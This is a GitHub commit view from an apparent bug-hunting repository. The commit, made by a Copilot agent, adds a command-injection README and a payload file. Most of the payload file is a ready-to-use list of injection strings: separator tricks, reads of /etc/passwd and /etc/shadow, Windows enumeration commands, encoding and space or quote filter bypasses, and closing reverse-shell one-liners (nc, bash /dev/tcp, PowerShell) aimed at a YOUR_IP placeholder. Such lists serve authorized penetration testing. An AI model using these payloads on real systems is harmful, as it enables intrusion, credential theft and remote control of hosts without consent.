mirror of
https://github.com/0x5t4l1n/hunting.git
synced 2026-05-26 11:35:51 +00:00
Restructure repository: Remove OWASP categorization, organize by vulnerability type
Co-authored-by: Stalin-143 <161853795+Stalin-143@users.noreply.github.com>
This commit is contained in:
copilot-swe-agent[bot]
@@ -0,0 +1,17 @@
|
||||
# Command Injection
|
||||
|
||||
## Description
|
||||
Command injection is a cyber attack that involves executing arbitrary commands on a host operating system. This vulnerability occurs when an application passes unsafe user-supplied data to a system shell.
|
||||
|
||||
## Common Attack Vectors
|
||||
- System administration interfaces
|
||||
- File upload functionality
|
||||
- Network diagnostic tools (ping, traceroute)
|
||||
- Backup/restore functions
|
||||
- Any feature that executes system commands
|
||||
|
||||
## Testing Approach
|
||||
Submit command separators and system commands in input fields to test if the application executes arbitrary commands.
|
||||
|
||||
## Payloads
|
||||
See `command-injection-payloads.txt` for a comprehensive list of command injection payloads.
|
||||
@@ -0,0 +1,80 @@
|
||||
# Command Injection Payloads
|
||||
|
||||
# Basic command injection
|
||||
; ls
|
||||
| ls
|
||||
|| ls
|
||||
& ls
|
||||
&& ls
|
||||
`ls`
|
||||
$(ls)
|
||||
|
||||
# Chained commands
|
||||
; whoami
|
||||
| whoami
|
||||
|| whoami
|
||||
& whoami
|
||||
&& whoami
|
||||
|
||||
# Command substitution
|
||||
`whoami`
|
||||
$(whoami)
|
||||
;`whoami`
|
||||
;$(whoami)
|
||||
|
||||
# File operations
|
||||
; cat /etc/passwd
|
||||
| cat /etc/passwd
|
||||
; cat /etc/shadow
|
||||
| cat /etc/shadow
|
||||
; ls -la
|
||||
| ls -la /
|
||||
|
||||
# Windows commands
|
||||
& dir
|
||||
| dir
|
||||
& type C:\Windows\win.ini
|
||||
| type C:\boot.ini
|
||||
& whoami
|
||||
| net user
|
||||
|
||||
# Time-based detection
|
||||
; sleep 5
|
||||
| sleep 5
|
||||
& ping -n 5 127.0.0.1
|
||||
| ping -c 5 127.0.0.1
|
||||
; timeout 5
|
||||
& timeout /t 5
|
||||
|
||||
# Output redirection
|
||||
; ls > /tmp/output.txt
|
||||
| ls > /tmp/output.txt
|
||||
& dir > C:\temp\output.txt
|
||||
|
||||
# URL encoded
|
||||
%3B%20ls
|
||||
%7C%20ls
|
||||
%26%20whoami
|
||||
|
||||
# Newline injection
|
||||
%0a whoami
|
||||
%0d%0a whoami
|
||||
\n whoami
|
||||
\r\n whoami
|
||||
|
||||
# Spaces bypass
|
||||
;cat</etc/passwd
|
||||
|cat</etc/passwd
|
||||
{cat,/etc/passwd}
|
||||
cat${IFS}/etc/passwd
|
||||
cat$IFS/etc/passwd
|
||||
|
||||
# Quotes bypass
|
||||
c'a't /etc/passwd
|
||||
c"a"t /etc/passwd
|
||||
c\at /etc/passwd
|
||||
|
||||
# Reverse shell payloads (for authorized testing only - replace YOUR_IP and PORT)
|
||||
; nc -e /bin/sh YOUR_IP PORT
|
||||
| bash -i >& /dev/tcp/YOUR_IP/PORT 0>&1
|
||||
& powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('YOUR_IP',PORT);"
|
||||
Reference in New Issue
Block a user